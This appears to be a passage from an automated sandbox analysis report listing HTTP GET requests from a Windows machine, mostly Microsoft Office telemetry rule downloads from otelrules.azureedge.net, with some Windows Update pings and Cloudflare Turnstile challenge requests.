Source: global traffic	HTTP traffic detected: GET /rules/rule700150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /sls/ping HTTP/1.1Connection: Keep-AliveUser-Agent: DNS resiliency checker/1.0Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule703451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/377496615:1729797319:ogjAsRMl1tpa_qoXXy9ZpyxOEyCgxnLQP9t8yxWRQ2E/8d7cae957e10e556/3NXPHSK0Y7qWTCnOHHR9z4lle9M2EwsxrP43E54KFLk-1729801378-1.1.1.1-fV7WEagQ3F1BWhD80g9IFQSDrItgEGii0MvgAEfYiOlPT1jhcPwY0dkb2j0_W16b HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule702651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/8d7cae957e10e556/1729801381091/5088b09fb68d7929013e558d26e9151ba07e6f6cddf0acb0b360434e05b546e1/sI7JTmcAKDMen4Z HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule702650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=H2D+HCngALeUZfR&MD=mAexEuHX HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7cae957e10e556/1729801381093/UOIh-UQBb-h8ajQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/n38o4/0x4AAAAAAAxr5TbTd3MTHi9f/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule703851v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703850v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703601v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703801v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703600v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/8d7cae957e10e556/1729801381093/UOIh-UQBb-h8ajQ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule703701v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703800v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703700v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703751v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703750v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=H2D+HCngALeUZfR&MD=mAexEuHX HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic	HTTP traffic detected: GET /rules/rule701301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/377496615:1729797319:ogjAsRMl1tpa_qoXXy9ZpyxOEyCgxnLQP9t8yxWRQ2E/8d7cae957e10e556/3NXPHSK0Y7qWTCnOHHR9z4lle9M2EwsxrP43E54KFLk-1729801378-1.1.1.1-fV7WEagQ3F1BWhD80g9IFQSDrItgEGii0MvgAEfYiOlPT1jhcPwY0dkb2j0_W16b HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /rules/rule701300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704051v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702051v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702050v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704050v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703151v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703150v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703951v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700001v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703950v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700000v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701851v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701850v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703051v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703050v3s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule700650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703301v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule703300v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701751v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701750v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701651v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701650v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule702450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global traffic	HTTP traffic detected: GET /rules/rule701101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
